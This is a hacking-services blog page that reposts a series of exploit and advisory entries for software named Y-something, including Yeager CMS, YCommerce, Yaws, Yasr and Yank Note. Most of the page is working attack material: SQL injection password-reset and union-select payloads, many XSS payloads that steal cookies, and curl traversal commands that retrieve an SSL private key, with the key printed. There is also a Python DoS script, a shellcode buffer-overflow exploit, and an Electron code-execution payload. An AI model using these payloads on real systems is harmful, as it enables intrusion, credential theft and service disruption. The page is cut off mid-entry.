Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863118133

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Yeager CMS
 vulnerable version: 1.2.1
      fixed version: 1.3
         CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570
,
                     CVE-2015-7571, CVE-2015-7572
             impact: Critical
           homepage: http://yeager.cm/en/home/
              found: 2015-11-18
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.


Business recommendation:
------------------------
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
    1. Change user's passwords including the administrator's account.
    2. Gain full access to the Yeager CMS database.
    3. Determine internal servers that inaccessible from the Internet.
    4. Attack other users of the Yeager CMS with Cross-Site Scripting.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)


Proof of concept:
-----------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
http://<host>/yeager/?action=passwordreset&token=<SQL Injection>
http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70
&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"<SQL
Injection>"}}]

The vulnerability can also be used for unauthorized reset password of any user.
In order to reset a specific user's password, an attacker will need to provide
a valid email address of the user that he wants to attack.
The email can be retrieved by either social engineering or using the
aforementioned unauthenticated SQL injection vulnerability.

http://<host>/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&lh=70&d
ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@ema
il.com>","winID":"1"}}]

The above URL just simply creates and sends a reset password token to the
user's email. Next, even if attacker does not know the token,
manipulating SQL commands allows to force to set the new password instantly.

Note that new password MUST be at least 8 characters in length
and must contain both letters and numbers.

http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70
&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+ui
d=(select+id+from+yg_user+where+login='<victim@email.com>')+limit+1--+-","userP
assword":"<new-password>","winID":"1"}}]

2. Post-authentication Blind SQL Injection (CVE-2015-7569)
http://<host>/yeager/y.php/tab_USERLIST
POST Data:
win_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&
lh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=<SQL
Injection>&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1

3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known Arbitrary File Upload vulnerability of Plupload was found in
Yeager CMS.
Fortunately, to successfully exploit the vulnerability requires PHP directive
"upload_tmp_dir" set to an existing directory and it must contain the writable
directory "plupload".

By default, the PHP directive "upload_tmp_dir" is an empty value.
As a result, the script will attempt to upload a file to /plupload/ instead
which generally does not exist on the filesystem.

http://<host>/yeager/ui/js/3rd/plupload/examples/upload.php

4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php

The parameter "dbhost" can be used to perform internal port scan using
time delay measurement. An attacker can provide internal IP address
and port number, for example, 10.10.0.1:22. The attacker then compares
time delays from multiple responses in order to determine host
and port availability.

5. Non-permanent Cross-site Scripting (CVE-2015-7572)
A previously published XSS vulnerability of Plupload was found in Yeager CMS.
http://<host>/yeager/ui/js/3rd/plupload/js/plupload.flash.swf?id=\%22%29%29;}ca
tch%28e%29{alert%28/XSS/%29;}//


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been tested on Yeager CMS 1.2.1

URL: http://yeager.cm/en/download/package/?v=1.2.1.0.0


Vendor contact timeline:
------------------------
2015-12-07: Contacting vendor through office@nexttuesday.de, contact@yeager.cm
2015-12-07: Established secure communication channel
2015-12-07: Sending advisory draft
2015-12-10: Yeager CMS 1.2.2 released for security fixes
2015-12-22: Yeager CMS 1.3 released for security fixes
2016-02-10: Public advisory release

Solution:
---------
The vulnerability has been fixed in Yeager CMS 1.3 and later.

https://github.com/ygcm/yeager/commit/74e0ce518321e659cda54f3f565ca0ce8794dba8#
diff-4200a6e704ae66ada32f35f69796cc71
https://github.com/ygcm/yeager/commit/053a3b98a9a3f4fd94186cbb8994de0a3e8d9307

Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Pichaya Morimoto / @2015
HireHackking 
source: https://www.securityfocus.com/bid/55653/info

YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
HireHackking 
source: https://www.securityfocus.com/bid/47158/info

Yaws-Wiki is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Yaws-Wiki 1.88-1 is vulnerable; other versions may also be affected. 

Reflective XSS:
http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
 
Stored XSS:
http://www.example.com/editPage.yaws?node=home
HireHackking 
source: https://www.securityfocus.com/bid/51276/info

Yaws is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.

Yaws 1.88 is vulnerable; other versions may be affected. 

http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
http://www.example.com/editPage.yaws?node=home
HireHackking 
[+] Credits: John Page aka hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec            
 


Vendor:
==========
yaws.hyber.org



Product:
===========
Yaws v1.91 (Yet Another Web Server)

Yaws is a HTTP high perfomance 1.1 webserver particularly well suited for dynamic-content web applications.
Two separate modes of operations are supported:

Standalone mode where Yaws runs as a regular webserver daemon. This is the default mode.
Embedded mode where Yaws runs as an embedded webserver in another Erlang application.



Vulnerability Type:
===================
Unauthenticated Remote File Disclosure



CVE Reference:
==============
CVE-2017-10974



Security Issue:
================
Remote attackers who can reach Yaws web server can read the server SSL private key file using directory
traversal attacks, access logs are also disclosed etc... this version is somewhat old, however, still avail for download
as of the time of this writing. http://yaws.hyber.org/download/



Exploit/POC:
=============
Steal Yaws Server SSL private key ".pem" file.

curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem


-----BEGIN RSA PRIVATE KEY-----
MIICWwIAAAKBgQDMJHAcJXB9TzkYg/ghXNjOAp3zcgKC4XZo4991SPGYukKVU1Fv
RX0YgPx3wz8Ae7ykPg0KW7O3D9Pn8liazTYEaXskNKAzOFr1gtBd7p937PKNQk++
3/As5EfJjz+lBrwUGbSicJgldJk3Cj89htMUqGwL2Bl/yOQIsZtyLlrP1wIDAQAB
AoGAYgEwTWLwAUjSaWGs8zJm52g8Ok7Gw+CfNzYG5oCxdBgftR693sSmjOgHzNtQ
WMQOyW7eDBYATmdr3VPsk8znHBSfQ19gAJjR89lJ6lt5qDMNtXMUWILn91g+RbkO
gmTkhD8uc0e/3FJBwPxFJWQzFEcAR4jNFJwhNzg6CO8CK/ECQQD7sNzvMRnUi1RQ
tiKgRxdjdEwNh52OUPwuJWhKdBLIpHBAJxCBHJB+1N0ufpqaEgUfJ5+gEYrBRMJh
aTCIJul5AkEAz6MsmkMz6Iej5zlKrlDL5q6GU+wElXK/F1H8tN/JchoSXN8BRCJZ
DLpK0mcMN4yukHKDCo0LD9NBlRQFDll/zwJASb2CrW2kVLpRhKgoMu9BMflDwv8G
IcqmZ9q72HxzeGd9H76SPlGhIBe7icC8CQHYkE0qnlolXgSIMsP/3RQReQJAYHnt
+INvNAUKSB6br6EFDNtcuNO6UYJufbRvmc89d5HbpGFN4k2fWMWajGarC4iHd8Bt
WNKuKB09pLoXm1JEiwJAfRtIXE6sr4MQOL6aWwGElw+Yb4B1WBhBiPRRwGTX0nzN
HXF3851+kgZBZjjzA3Ib2nr5PeXkZBBLE/4jJvRPRA==
-----END RSA PRIVATE KEY-----



--- OR Read the access logs. ---


curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access  

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY>
<H1>Not Found</H1>The requested URL /../logs/localhost.8080.access was not found on this server.<P><HR>
<address> Yaws 1.91 Server at localhost:8080 </address>  </BODY></HTML>[root@localhost ~]# 

Then,


curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access

127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

etc...



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=================================
Vendor Notification: June 26, 2017
No replies
July 7, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10

------------------------------[Description]---------------------------------

This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
The result it crashes

 -----------------------------[Exploit]---------------------------------------------

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

import socket, sys

target = (sys.argv[1], int(sys.argv[2]))
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))
s.send(buffer)
s.close()

 -----------------------------[how to run]-----------------------------

C:\> TinyWinFTP.exe servepath port

~$ python3 exploit.py targetip port

Boom!
HireHackking 
'''
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: General-purpose console screen reader
# Version: 0.6.9-5
#
# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Yasr is a general-purpose console screen reader
for GNU/Linux and other Unix-like operating systems.
# Kali Linux 2.0 package: pool/main/y/yasr/yasr_0.6.9-5_i386.deb
# MD5sum: 910f4b41fd09d5486b935097dc8dd2f8
# Website: http://yasr.sourceforge.net/
#
#
# Starting program: /usr/bin/yasr -p $(python -c 'print "\x90"*258')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
# Program received signal SIGSEGV, Segmentation fault.
#
# 0x90909090 in ?? ()
#
#gdb$ backtrace
#0  0xb7fdebe0 in __kernel_vsyscall ()
#1  0xb7e33367 in __GI_raise (sig=sig@entry=0x6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2  0xb7e34a23 in __GI_abort () at abort.c:89
#3  0xb7e71778 in __libc_message (do_abort=do_abort@entry=0x2,
fmt=fmt@entry=0xb7f67715 "*** %s ***: %s terminated\n") at
../sysdeps/posix/libc_fatal.c:175
#4  0xb7f01b85 in __GI___fortify_fail (msg=msg@entry=0xb7f67696
"buffer overflow detected") at fortify_fail.c:31
#5  0xb7effc3a in __GI___chk_fail () at chk_fail.c:28
'''

import os, subprocess

def run():
  try:
    print "# Yasr Console Screen Reader - Buffer Overflow by Juan Sacco"
    print "# This exploit is for educational purposes only"
    # JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*298
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*12
    eip = "\xd2\xf3\xff\xbf"
    subprocess.call(["yasr ",'-p ', junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, Yasr Console Reader - Not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit Yasr 0.6.9-5 Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
run()
HireHackking 
source: https://www.securityfocus.com/bid/61356/info

YardRadius is prone to multiple local format-string vulnerabilities.

Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible.

YardRadius 1.1.2-4 is vulnerable; other versions may also be possible.

The following proof-of-concept is available:

ln -s radiusd %x

./%x -v
HireHackking 
source: https://www.securityfocus.com/bid/47698/info

YaPIG is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

YaPIG 0.95 is vulnerable; other versions may also be affected. 

http://www.example.com/template/default/add_comment_form.php?I_ADD_COMMENT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/admin_task_bar.php?I_ADMIN_TASKS=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/delete_gallery_form.php?I_SELECT_OPT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/face_begin.php?I_TITLE=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/slideshow.php?interval=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]

Release Date: 2023-04-27

Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement

Technical Details & Description:

A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload.
Mac:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">

Ubuntu:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">

Opening the file in Yank Note will auto execute the Calculator application.
HireHackking 
source: https://www.securityfocus.com/bid/53622/info

Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. 

http://www.example.com/search/?text=%27);alert(document.cookie)//
HireHackking 
source: https://www.securityfocus.com/bid/53709/info

Yamamah Photo Gallery is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to download the database that contain sensitive information. Information harvested may aid in launching further attacks.

Yamamah 1.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/yamamah/cp/export.php
HireHackking 
source: https://www.securityfocus.com/bid/51011/info

The Yahoo! CD Player ActiveX control ('YoPlyCd.dll') is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.

Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. 

<object classid='clsid:5622772D-6C27-11D3-95E5-006008D14F3B' id='test'></object>

<script language='vbscript'>

 buff = String(2097512, "A") '<- EAX changes according to the first parameter of
                             '   "String" function (Number As Long)
 test.open buff

</script>
HireHackking 
# Exploit Title: Yahoo User Interface library (YUI2) TreeView  v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197


The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
most files. A sample of the vulnerable files along with the exploit
can be found here:

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

Twitter: @Ryan_412_
HireHackking 
# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
# Google Dork: intitle:"Proberv0." | inurl:/proberv.php
# Date: 23/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: http://www.yahei.net/
# Software Link: www.yahei.net/tz/tz_e.zip
# Version: 0.4.7
# CVE: CVE-2018-9238
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.


#2. Proof of Concept
-----------------------------------------------------
Request:

POST /proberv.php HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: <target>/proberv.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Connection: close
Upgrade-Insecure-Requests: 1

pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=

-----------------------------------------------------
Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 16:59:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 30461
...
<tr>
<td width="15%"></td>
<td width="60%">
Enter the function you want to test:
<input type="text" name="funName" size="50" />
</td>
<td width="25%">
<input class="btn" type="submit" name="act" align="right" value="Function
Test" />
</td>
</tr>
<script>alert('Function')</script><script>alert("1");</script>Test results
support the position: 错误')</script></table>


#3. References
-----------------------------------------------------
https://pastebin.com/ia7U4vi9
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238
HireHackking 
source: https://www.securityfocus.com/bid/47089/info

YaCOMAS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

YaCOMAS 0.3.6 is vulnerable; other versions may also be affected. 

===================================================================
    YaCOMAS 0.3.6 Multiple vulnerability
===================================================================
     
Software:   Yacomas 0.3.6
Vendor:     http://yacomas.sourceforge.net/
Vuln Type:  Multiple Vulnerability
Download link:  http://patux.net/downloads/yacomas-0.3.6_alpha.tar.gz
Author:     Pr@fesOr X
contact:    profesor_x(at)otmail.com
Home:       www.ccat.edu.mx
Company:    Centro de Investigaciones en Alta Tecnologia
  
   
  
=========================
--Description  XSS  --
=========================
 
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
 
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
 
===============================
--= Attack details No. 1 =--
===============================
 
This vulnerability affects /yacomas/asistente/index.php.
 
 
http://www.site.com/yacomas/asistente/index.php?opc=1
 
 
--URL encoded POST input S_apellidos was set to " onmouseover=prompt(11111111111) bad="
 
 
--The input is reflected inside a tag element between double quotes.
 
 
--details:  can you inyect this in the HTTP headers whit this data:
 
-----------------------
C_sexo=M&I_b_day=0&I_b_month=0&I_b_year=0&I_id_estado=0&I_id_estudios=0&I_id_tasistente=0&S_apellidos=%22%20onmouseover%3dprompt%2811111111111%29%20bad%3d%22&S_ciudad=&S_login=oijclpgk&S_mail=hola@ccat.edu.mx.tst&S_nombrep=oijclpgk&S_org=&S_passwd=rodolfo&S_passwd2=rodolfo&submit=Registrarme
------------------------
 
 
===============================
--= Vulnerable forms and variables =--
===============================
 
S_apellidos
s_ciudad
s_login
s_mail
s_nombrep
s_org
 
 
===============================
--= Attack XSS details No. 2 =--
===============================
 
http://www.site.com/yacomas/admin/index.php
 
 
--details:  can you inyect this in the HTTP headers whit this data in the Content-Length: header
 
------------------------------------------
 
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
 
-------------------------------------------------------------------
 
 
==========================================
--= Attack XSS remote code execution No. 2 =--
==========================================
 
http://www.site.com/yacomas/admin/index.php
 
 
--details:  can you inyect this in the HTTP headers whit this data in the Content-Length: header
 
------------------------------------------
 
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
 
-------------------------------------------------------------------
HireHackking 
# Exploit Title: Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
